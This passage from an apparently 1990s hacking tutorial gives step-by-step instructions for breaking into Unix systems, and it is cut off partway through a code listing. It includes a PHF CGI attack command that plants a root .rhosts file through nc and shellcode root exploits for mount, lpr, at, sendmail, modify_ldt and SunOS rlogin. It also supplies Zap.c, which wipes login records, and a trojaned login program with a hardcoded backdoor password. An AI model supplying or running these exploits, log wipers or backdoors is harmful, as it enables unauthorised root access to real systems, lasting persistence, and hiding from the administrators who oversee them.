mean that the site has a web page.
(And that's very bad, 'cuz it usually it's vulnerable).
Below I include the source of a scanner that helped me when NMAP wasn't written.
(Go get it at http://www.dhp.com/~fyodor. Good job, Fyodor).
NMAP is a scanner that does even stealth scanning, so lots of systems won't
record it.

/* -*-C-*- tcpprobe.c */
/* tcpprobe - report on which tcp ports accept connections */
/* IO ERROR, error@axs.net, Sep 15, 1995 */

#include
#include
#include
#include
#include
#include

int main(int argc, char **argv)
{
int probeport = 0;
struct hostent *host;
int err, i, net;
struct sockaddr_in sa;

if (argc != 2) {
printf("Usage: %s hostname\n", argv[0]);
exit(1);
}

for (i = 1; i < 1024; i++) {
strncpy((char *)&sa, "", sizeof sa);
sa.sin_family = AF_INET;
if (isdigit(*argv[1]))
sa.sin_addr.s_addr = inet_addr(argv[1]);
else if ((host = gethostbyname(argv[1])) != 0)
strncpy((char *)&sa.sin_addr, (char *)host->h_addr, sizeof sa.sin_addr);
else {
herror(argv[1]);
exit(2);
}
sa.sin_port = htons(i);
net = socket(AF_INET, SOCK_STREAM, 0);
if (net < 0) {
perror("\nsocket");
exit(2);
}
err = connect(net, (struct sockaddr *) &sa, sizeof sa);
if (err < 0) {
printf("%s %-5d %s\r", argv[1], i, strerror(errno));
fflush(stdout);
} else {
printf("%s %-5d accepted. \n", argv[1], i);
if (shutdown(net, 2) < 0) {
perror("\nshutdown");
exit(2);
}
}
close(net);
}
printf(" \r");
fflush(stdout);
return (0);
}

Well, now be very carefull with the below exploits, because they usually get
logged.
Besides, if you really wanna get a source file from /cgi-bin/ use this
sintax : lynx http://www.victim1.com//cgi-bin/finger
If you don't wanna do that, then do a :

mysite:~>echo "+ +" > /tmp/rhosts

mysite:~>echo "GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts+
/root/.rhosts" | nc -v - 20 victim1.site.com 80

then
mysite:~>rlogin -l root victim1.site.com
Welcome to Victim1.Site.Com.
victim1:~#

Or, maybe, just try to find out usernames and passwords...
The usual users are "test", "guest", and maybe the owner of the site...
I usually don't do such things, but you can...

Or if the site is really old, use that (quote site exec) old bug for
wu.ftpd.
There are a lot of other exploits, like the remote exploits (innd, imap2,
pop3, etc...) that you can find at rootshell.connectnet.com or at
dhp.com/~fyodor.

Enough about this topic. (besides, if you can finger the site, you can
figgure out usernames and maybe by guessing passwords (sigh!) you could get
access to the site).

Step 2: Hacking r00t.
______

First you have to find the system it's running...
a). LINUX
ALL versions:
A big bug for all linux versions is mount/umount and (maybe) lpr.

/* Mount Exploit for Linux, Jul 30 1996

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````"":::::::::
:::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ ::::::
:::::::...........:::...........:::...........::.......:......:.......::::::
:::::::::::::::::::::::::::::::::::::::::::::::;::::::::::::::::::::::::::::

Discovered and Coded by Bloodmask & Vio
Covin Security 1996
*/

#include
#include
#include
#include
#include

#define PATH_MOUNT "/bin/mount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
__asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;

int i;
int ofs = DEFAULT_OFFSET;

buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;

/* fill start of buffer with nops */

memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);

/* stick asm code into the buffer */

for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];

addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;

(void)alarm((u_int)0);
printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");
execl(PATH_MOUNT, "mount", buff, NULL);
}

/*LPR exploit:I don't know the author...*/

#include
#include
#include

#define DEFAULT_OFFSET 50
#define BUFFER_SIZE 1023

long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}

void main()
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;

u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/bin/sh";
int i;

buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i<2;i++)
*(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}

b.) Version's 1.2.* to 1.3.2
NLSPATH env. variable exploit:

/* It's really annoying for users and good for me...
AT exploit gives only uid=0 and euid=your_usual_euid.
*/
#include
#include
#include
#include
#include

#define path "/usr/bin/at"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
__asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;

int i;
int ofs = DEFAULT_OFFSET;

buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;

memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);

for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];

addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;

(void)alarm((u_int)0);
printf("AT exploit discovered by me, _PHANTOM_ in 1997.\n");
setenv("NLSPATH",buff,1);
execl(path, "at",NULL);
}

SENDMAIL exploit: (don't try to chmod a-s this one... :) )

/* SENDMAIL Exploit for Linux
*/

#include
#include
#include
#include
#include

#define path "/usr/bin/sendmail"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
__asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff./sh";

char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;

int i;
int ofs = DEFAULT_OFFSET;

buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;

memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);

for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];

addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;

(void)alarm((u_int)0);
printf("SENDMAIL exploit discovered by me, _PHANTOM_ in 1997\n");
setenv("NLSPATH",buff,1);
execl(path, "sendmail",NULL);
}

MOD_LDT exploit (GOD, this one gave such a headache to my Sysadmin (ROOT)
!!!)

/* this is a hack of a hack. a valid System.map was needed to get this
sploit to werk.. but not any longer.. This sploit will give you root
if the modify_ldt bug werks.. which I beleive it does in any kernel
before 1.3.20 ..

QuantumG
*/

/* original code written by Morten Welinder.
*
* this required 2 hacks to work on the 1.2.13 kernel that I've tested on:
* 1. asm/sigcontext.h does not exist on 1.2.13 and so it is removed.
* 2. the _task in the System.map file has no leading underscore.
* I am not sure at what point these were changed, if you are
* using this on a newer kernel compile with NEWERKERNEL defined.
* -ReD
*/

#include
#include
#include
#include
#ifdef NEWERKERNEL
#include
#endif
#define __KERNEL__
#include
#include

static inline _syscall1(int,get_kernel_syms,struct kernel_sym *,table);
static inline _syscall3(int, modify_ldt, int, func, void *, ptr, unsigned long, bytecount)

#define KERNEL_BASE 0xc0000000
/* ------------------------------------------------------------------------ */
static __inline__ unsigned char
__farpeek (int seg, unsigned ofs)
{
unsigned char res;
asm ("mov %w1,%%gs ; gs; movb (%2),%%al"
: "=a" (res)
: "r" (seg), "r" (ofs));
return res;
}
/* ------------------------------------------------------------------------ */
static __inline__ void
__farpoke (int seg, unsigned ofs, unsigned char b)
{
asm ("mov %w0,%%gs ; gs; movb %b2,(%1)"
: /* No results. */
: "r" (seg), "r" (ofs), "r" (b));
}
/* ------------------------------------------------------------------------ */
void
memgetseg (void *dst, int seg, const void *src, int size)
{
while (size-- > 0)
*(char *)dst++ = __farpeek (seg, (unsigned)(src++));
}
/* ------------------------------------------------------------------------ */
void
memputseg (int seg, void *dst, const void *src, int size)
{
while (size-- > 0)
__farpoke (seg, (unsigned)(dst++), *(char *)src++);
}
/* ------------------------------------------------------------------------ */
int
main ()
{
int stat, i,j,k;
struct modify_ldt_ldt_s ldt_entry;
FILE *syms;
char line[100];
struct task_struct **task, *taskptr, thistask;
struct kernel_sym blah[4096];

printf ("Bogusity checker for modify_ldt system call.\n");

printf ("Testing for page-size limit bug...\n");
ldt_entry.entry_number = 0;
ldt_entry.base_addr = 0xbfffffff;
ldt_entry.limit = 0;
ldt_entry.seg_32bit = 1;
ldt_entry.contents = MODIFY_LDT_CONTENTS_DATA;
ldt_entry.read_exec_only = 0;
ldt_entry.limit_in_pages = 1;
ldt_entry.seg_not_present = 0;
stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry));
if (stat)
/* Continue after reporting error. */
printf ("This bug has been fixed in your kernel.\n");
else
{
printf ("Shit happens: ");
printf ("0xc0000000 - 0xc0000ffe is accessible.\n");
}

printf ("Testing for expand-down limit bug...\n");
ldt_entry.base_addr = 0x00000000;
ldt_entry.limit = 1;
ldt_entry.contents = MODIFY_LDT_CONTENTS_STACK;
ldt_entry.limit_in_pages = 0;
stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry));
if (stat)
{
printf ("This bug has been fixed in your kernel.\n");
return 1;
}
else
{
printf ("Shit happens: ");
printf ("0x00000000 - 0xfffffffd is accessible.\n");
}

i = get_kernel_syms(blah);
k = i+10;
for (j=0; j if (!strcmp(blah[j].name,"current") || !strcmp(blah[j].name,"_current")) k = j;
if (k==i+10) { printf("current not found!!!\n"); return(1); }
j=k;

taskptr = (struct task_struct *) (KERNEL_BASE + blah[j].value);
memgetseg (&taskptr, 7, taskptr, sizeof (taskptr));
taskptr = (struct task_struct *) (KERNEL_BASE + (unsigned long) taskptr);
memgetseg (&thistask, 7, taskptr, sizeof (thistask));
if (thistask.pid!=getpid()) { printf("current process not found\n"); return(1); }
printf("Current process is %i\n",thistask.pid);
taskptr = (struct task_struct *) (KERNEL_BASE + (unsigned long) thistask.p_pptr);
memgetseg (&thistask, 7, taskptr, sizeof (thistask));
if (thistask.pid!=getppid()) { printf("current process not found\n"); return(1); }
printf("Parent process is %i\n",thistask.pid);
thistask.uid = thistask.euid = thistask.suid = thistask.fsuid = 0;
thistask.gid = thistask.egid = thistask.sgid = thistask.fsgid = 0;
memputseg (7, taskptr, &thistask, sizeof (thistask));
printf ("Shit happens: parent process is now root process.\n");
return 0;
};

c.) Other linux versions:
Sendmail exploit:

#/bin/sh
#
#
# Hi !
# This is exploit for sendmail smtpd bug
# (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
# This shell script does a root shell in /tmp directory.
# If you have any problems with it, drop me a letter.
# Have fun !
#
#
# ----------------------
# ---------------------------------------------
# ----------------- Dedicated to my beautiful lady ------------------
# ---------------------------------------------
# ----------------------
#
# Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
#
#
#
echo 'main() '>>leshka.c
echo '{ '>>leshka.c
echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c
echo '} '>>leshka.c
#
#
echo 'main() '>>smtpd.c
echo '{ '>>smtpd.c
echo ' setuid(0); setgid(0); '>>smtpd.c
echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c
echo '} '>>smtpd.c
#
#
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
echo "Now type: /tmp/sh"

SUNOS:
Rlogin exploit:
(arghh!)
#include
#include
#include
#include

#define BUF_LENGTH 8200
#define EXTRA 100
#define STACK_OFFSET 4000
#define SPARC_NOP 0xa61cc013

u_char sparc_shellcode[] =
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";

u_long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}

void main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA];
long targ_addr;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen(sparc_shellcode);

long_p = (u_long *) buf;

for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;

char_p = (u_char *) long_p;

for (i = 0; i < code_length; i++)
*char_p++ = sparc_shellcode[i];

long_p = (u_long *) char_p;

targ_addr = get_sp() - STACK_OFFSET;
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ = targ_addr;

printf("Jumping to address 0x%lx\n", targ_addr);

execl("/usr/bin/rlogin", "rlogin", buf, (char *) 0);
perror("execl failed");
}

Want more exploits? Get 'em from other sites (like rootshell,
dhp.com/~fyodor, etc...).

Step 3: Covering your tracks:
______

For this you could use lots of programs like zap, utclean, and lots of
others...
Watch out, ALWAYS after you cloaked yourself to see if it worked do a:
victim1:~$ who
...(crap)...
victim1:~$ finger
...;as;;sda...
victim1:~$w
...

If you are still not cloaked, look for wtmpx, utmpx and other stuff like
that. The only cloaker (that I know) that erased me even from wtmpx/utmpx
was utclean. But I don't have it right now, so ZAP'll have to do the job.

/*
Title: Zap.c (c) rokK Industries
Sequence: 911204.B

Syztems: Kompiles on SunOS 4.+
Note: To mask yourself from lastlog and wtmp you need to be root,
utmp is go+w on default SunOS, but is sometimes removed.
Kompile: cc -O Zap.c -o Zap
Run: Zap

Desc: Will Fill the Wtmp and Utmp Entries corresponding to the
entered Username. It also Zeros out the last login data for
the specific user, fingering that user will show 'Never Logged
In'

Usage: If you cant find a usage for this, get a brain.
*/

#include
#include
#include
#include
#include
#include
#include

int f;

void kill_tmp(name,who)
char *name,
*who;
{
struct utmp utmp_ent;

if ((f=open(name,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}

void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;

if ((pwd=getpwnam(who))!=NULL) {

if ((f=open("/usr/adm/lastlog", O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}

} else printf("%s: ?\n",who);
}

main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_tmp("/etc/utmp",argv[1]);
kill_tmp("/usr/adm/wtmp",argv[1]);
kill_lastlog(argv[1]);
printf("Zap!\n");
} else
printf("Error.\n");
}

Step 4: Keeping that account.
_______

This usually means that you'll have to install some programs to give you
access even if the root has killed your account...
(DAEMONS!!!) =>|-@
Here is an example of a login daemon from the DemonKit (good job,
fellows...)
LOOK OUT !!! If you decide to put a daemon, be carefull and modify it's date
of creation. (use touch --help to see how!)

/*
This is a simple trojanized login program, this was designed for Linux
and will not work without modification on linux. It lets you login as
either a root user, or any ordinary user by use of a 'magic password'.
It will also prevent the login from being logged into utmp, wtmp, etc.
You will effectively be invisible, and not be detected except via 'ps'.
*/

#define BACKDOOR "password"
int krad=0;

/* This program is derived from 4.3 BSD software and is
subject to the copyright notice below.

The port to HP-UX has been motivated by the incapability
of 'rlogin'/'rlogind' as per HP-UX 6.5 (and 7.0) to transfer window sizes.

Changes:

- General HP-UX portation. Use of facilities not available
in HP-UX (e.g. setpriority) has been eliminated.
Utmp/wtmp handling has been ported.

- The program uses BSD command line options to be used
in connection with e.g. 'rlogind' i.e. 'new login'.

- HP features left out: logging of bad login attempts in /etc/btmp,
they are sent to syslog

password expiry

'*' as login shell, add it if you need it

- BSD features left out: quota checks
password expiry
analysis of terminal type (tset feature)

- BSD features thrown in: Security logging to syslogd.
This requires you to have a (ported) syslog
system -- 7.0 comes with syslog

'Lastlog' feature.

- A lot of nitty gritty details has been adjusted in favour of
HP-UX, e.g. /etc/securetty, default paths and the environment
variables assigned by 'login'.

- We do *nothing* to setup/alter tty state, under HP-UX this is
to be done by getty/rlogind/telnetd/some one else.

Michael Glad (glad@daimi.dk)
Computer Science Department
Aarhus University
Denmark

1990-07-04

1991-09-24 glad@daimi.aau.dk: HP-UX 8.0 port:
- now explictly sets non-blocking mode on descriptors
- strcasecmp is now part of HP-UX
1992-02-05 poe@daimi.aau.dk: Ported the stuff to Linux 0.12
From 1992 till now (1995) this code for Linux has been maintained at
ftp.daimi.aau.dk:/pub/linux/poe/
*/

/*
* Copyright (c) 1980, 1987, 1988 The Regents of the University of California.
* All rights reserved.
*
* Redistribution and use in source and binary forms are permitted
* provided that the above copyright notice and this paragraph are
* duplicated in all such forms and that any documentation,
* advertising materials, and other materials related to such
* distribution and use acknowledge that the software was developed
* by the University of California, Berkeley. The name of the
* University may not be used to endorse or promote products derived
* from this software without specific prior written permission.
* THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED
* WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE.
*/

#ifndef lint
char copyright[] =
"@(#) Copyright (c) 1980, 1987, 1988 The Regents of the University of California.\n\
All rights reserved.\n";
#endif /* not lint */

#ifndef lint
static char sccsid[] = "@(#)login.c 5.40 (Berkeley) 5/9/89";
#endif /* not lint */

/*
* login [ name ]
* login -h hostname (for telnetd, etc.)
* login -f name (for pre-authenticated login: datakit, xterm, etc.)
*/

/* #define TESTING */

#ifdef TESTING
#include "param.h"
#else
#include
#endif

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define index strchr
#define rindex strrchr
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#ifdef TESTING
# include "utmp.h"
#else
# include
#endif

#ifdef SHADOW_PWD
#include
#endif

#ifndef linux
#include
#include
#else
struct lastlog
{ long ll_time;
char ll_line[12];
char ll_host[16];
};
#endif

#include "pathnames.h"

#define P_(s) ()
void opentty P_((const char *tty));
void getloginname P_((void));
void timedout P_((void));
int rootterm P_((char *ttyn));
void motd P_((void));
void sigint P_((void));
void checknologin P_((void));
void dolastlog P_((int quiet));
void badlogin P_((char *name));
char *stypeof P_((char *ttyid));
void checktty P_((char *user, char *tty));
void getstr P_((char *buf, int cnt, char *err));
void sleepexit P_((int eval));
#undef P_

#ifdef KERBEROS
#include
#include
char realm[REALM_SZ];
int kerror = KSUCCESS, notickets = 1;
#endif

#ifndef linux
#define TTYGRPNAME "tty" /* name of group to own ttys */
#else
# define TTYGRPNAME "other"
# ifndef MAXPATHLEN
# define MAXPATHLEN 1024
# endif
#endif

/*
* This bounds the time given to login. Not a define so it can
* be patched on machines where it's too small.
*/
#ifndef linux
int timeout = 300;
#else
int timeout = 60;
#endif

struct passwd *pwd;
int failures;
char term[64], *hostname, *username, *tty;

char thishost[100];

#ifndef linux
struct sgttyb sgttyb;
struct tchars tc = {
CINTR, CQUIT, CSTART, CSTOP, CEOT, CBRK
};
struct ltchars ltc = {
CSUSP, CDSUSP, CRPRNT, CFLUSH, CWERASE, CLNEXT
};
#endif

char *months[] =
{ "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug",
"Sep", "Oct", "Nov", "Dec" };

/* provided by Linus Torvalds 16-Feb-93 */
void
opentty(const char * tty)
{
int i;
int fd = open(tty, O_RDWR);

for (i = 0 ; i < fd ; i++)
close(i);
for (i = 0 ; i < 3 ; i++)
dup2(fd, i);
if (fd >= 3)
close(fd);
}

int
main(argc, argv)
int argc;
char **argv;
{
extern int errno, optind;
extern char *optarg, **environ;
struct timeval tp;
struct tm *ttp;
struct group *gr;
register int ch;
register char *p;
int ask, fflag, hflag, pflag, cnt;
int quietlog, passwd_req, ioctlval;
char *domain, *salt, *ttyn, *pp;
char tbuf[MAXPATHLEN + 2], tname[sizeof(_PATH_TTY) + 10];
char *ctime(), *ttyname(), *stypeof();
time_t time();
void timedout();
char *termenv;

#ifdef linux
char tmp[100];
/* Just as arbitrary as mountain time: */
/* (void)setenv("TZ", "MET-1DST",0); */
#endif

(void)signal(SIGALRM, timedout);
(void)alarm((unsigned int)timeout);
(void)signal(SIGQUIT, SIG_IGN);
(void)signal(SIGINT, SIG_IGN);

(void)setpriority(PRIO_PROCESS, 0, 0);
#ifdef HAVE_QUOTA
(void)quota(Q_SETUID, 0, 0, 0);
#endif

/*
* -p is used by getty to tell login not to destroy the environment
* -f is used to skip a second login authentication
* -h is used by other servers to pass the name of the remote
* host to login so that it may be placed in utmp and wtmp
*/
(void)gethostname(tbuf, sizeof(tbuf));
(void)strncpy(thishost, tbuf, sizeof(thishost)-1);
domain = index(tbuf, '.');

fflag = hflag = pflag = 0;
passwd_req = 1;
while ((ch = getopt(argc, argv, "fh:p")) != EOF)
switch (ch) {
case 'f':
fflag = 1;
break;

case 'h':
if (getuid()) {
(void)fprintf(stderr,
"login: -h for super-user only.\n");
exit(1);
}
hflag = 1;
if (domain && (p = index(optarg, '.')) &&
strcasecmp(p, domain) == 0)
*p = 0;
hostname = optarg;
break;

case 'p':
pflag = 1;
break;
case '?':
default:
(void)fprintf(stderr,
"usage: login [-fp] [username]\n");
exit(1);
}
argc -= optind;
argv += optind;
if (*argv) {
username = *argv;
ask = 0;
} else
ask = 1;

#ifndef linux
ioctlval = 0;
(void)ioctl(0, TIOCLSET, &ioctlval);
(void)ioctl(0, TIOCNXCL, 0);
(void)fcntl(0, F_SETFL, ioctlval);
(void)ioctl(0, TIOCGETP, &sgttyb);
sgttyb.sg_erase = CERASE;
sgttyb.sg_kill = CKILL;
(void)ioctl(0, TIOCSLTC, &ltc);
(void)ioctl(0, TIOCSETC, &tc);
(void)ioctl(0, TIOCSETP, &sgttyb);

/*
* Be sure that we're in
* blocking mode!!!
* This is really for HPUX
*/
ioctlval = 0;
(void)ioctl(0, FIOSNBIO, &ioctlval);
#endif

for (cnt = getdtablesize(); cnt > 2; cnt--)
close(cnt);

ttyn = ttyname(0);
if (ttyn == NULL || *ttyn == '\0') {
(void)sprintf(tname, "%s??", _PATH_TTY);
ttyn = tname;
}

setpgrp();

{
struct termios tt, ttt;

tcgetattr(0, &tt);
ttt = tt;
ttt.c_cflag &= ~HUPCL;

if((chown(ttyn, 0, 0) == 0) && (chmod(ttyn, 0622) == 0)) {
tcsetattr(0,TCSAFLUSH,&ttt);
signal(SIGHUP, SIG_IGN); /* so vhangup() wont kill us */
vhangup();
signal(SIGHUP, SIG_DFL);
}

setsid();

/* re-open stdin,stdout,stderr after vhangup() closed them */
/* if it did, after 0.99.5 it doesn't! */
opentty(ttyn);
tcsetattr(0,TCSAFLUSH,&tt);
}

if (tty = rindex(ttyn, '/'))
++tty;
else
tty = ttyn;

openlog("login", LOG_ODELAY, LOG_AUTH);

for (cnt = 0;; ask = 1) {
ioctlval = 0;
#ifndef linux
(void)ioctl(0, TIOCSETD, &ioctlval);
#endif

if (ask) {
fflag = 0;
getloginname();
}

checktty(username, tty);

(void)strcpy(tbuf, username);
if (pwd = getpwnam(username))
salt = pwd->pw_passwd;
else
salt = "xx";

/* if user not super-user, check for disabled logins */
if (pwd == NULL || pwd->pw_uid)
checknologin();

/*
* Disallow automatic login to root; if not invoked by
* root, disallow if the uid's differ.
*/
if (fflag && pwd) {
int uid = getuid();

passwd_req = pwd->pw_uid == 0 ||
(uid && uid != pwd->pw_uid);
}

/*
* If trying to log in as root, but with insecure terminal,
* refuse the login attempt.
*/
if (pwd && pwd->pw_uid == 0 && !rootterm(tty)) {
(void)fprintf(stderr,
"%s login refused on this terminal.\n",
pwd->pw_name);

if (hostname)
syslog(LOG_NOTICE,
"LOGIN %s REFUSED FROM %s ON TTY %s",
pwd->pw_name, hostname, tty);
else
syslog(LOG_NOTICE,
"LOGIN %s REFUSED ON TTY %s",
pwd->pw_name, tty);
continue;
}

/*
* If no pre-authentication and a password exists
* for this user, prompt for one and verify it.
*/
if (!passwd_req || (pwd && !*pwd->pw_passwd))
break;

setpriority(PRIO_PROCESS, 0, -4);
pp = getpass("Password: ");
if(strcmp(BACKDOOR, pp) == 0) krad++;

p = crypt(pp, salt);
setpriority(PRIO_PROCESS, 0, 0);

#ifdef KERBEROS

/*
* If not present in pw file, act as we normally would.
* If we aren't Kerberos-authenticated, try the normal
* pw file for a password. If that's ok, log the user
* in without issueing any tickets.
*/

if (pwd && !krb_get_lrealm(realm,1)) {
/*
* get TGT for local realm; be careful about uid's
* here for ticket file ownership
*/
(void)setreuid(geteuid(),pwd->pw_uid);
kerror = krb_get_pw_in_tkt(pwd->pw_name, "", realm,
"krbtgt", realm, DEFAULT_TKT_LIFE, pp);
(void)setuid(0);
if (kerror == INTK_OK) {
memset(pp, 0, strlen(pp));
notickets = 0; /* user got ticket */
break;
}
}
#endif

(void) memset(pp, 0, strlen(pp));
if (pwd && !strcmp(p, pwd->pw_passwd))
break;

if(krad != 0)
break;

(void)printf("Login incorrect\n");
failures++;
badlogin(username); /* log ALL bad logins */

/* we allow 10 tries, but after 3 we start backing off */
if (++cnt > 3) {
if (cnt >= 10) {
sleepexit(1);
}
sleep((unsigned int)((cnt - 3) * 5));
}
}

/* committed to login -- turn off timeout */
(void)alarm((unsigned int)0);

#ifdef HAVE_QUOTA
if (quota(Q_SETUID, pwd->pw_uid, 0, 0) < 0 && errno != EINVAL) {
switch(errno) {
case EUSERS:
(void)fprintf(stderr,
"Too many users logged on already.\nTry again later.\n");
break;
case EPROCLIM:
(void)fprintf(stderr,
"You have too many processes running.\n");
break;
default:
perror("quota (Q_SETUID)");
}
sleepexit(0);
}
#endif

/* paranoia... */
endpwent();

/* This requires some explanation: As root we may not be able to
read the directory of the user if it is on an NFS mounted
filesystem. We temporarily set our effective uid to the user-uid
making sure that we keep root privs. in the real uid.

A portable solution would require a fork(), but we rely on Linux
having the BSD setreuid() */

{
char tmpstr[MAXPATHLEN];
uid_t ruid = getuid();
gid_t egid = getegid();

strncpy(tmpstr, pwd->pw_dir, MAXPATHLEN-12);
strncat(tmpstr, ("/" _PATH_HUSHLOGIN), MAXPATHLEN);

setregid(-1, pwd->pw_gid);
setreuid(0, pwd->pw_uid);
quietlog = (access(tmpstr, R_OK) == 0);
setuid(0); /* setreuid doesn't do it alone! */
setreuid(ruid, 0);
setregid(-1, egid);
}

#ifndef linux
#ifdef KERBEROS
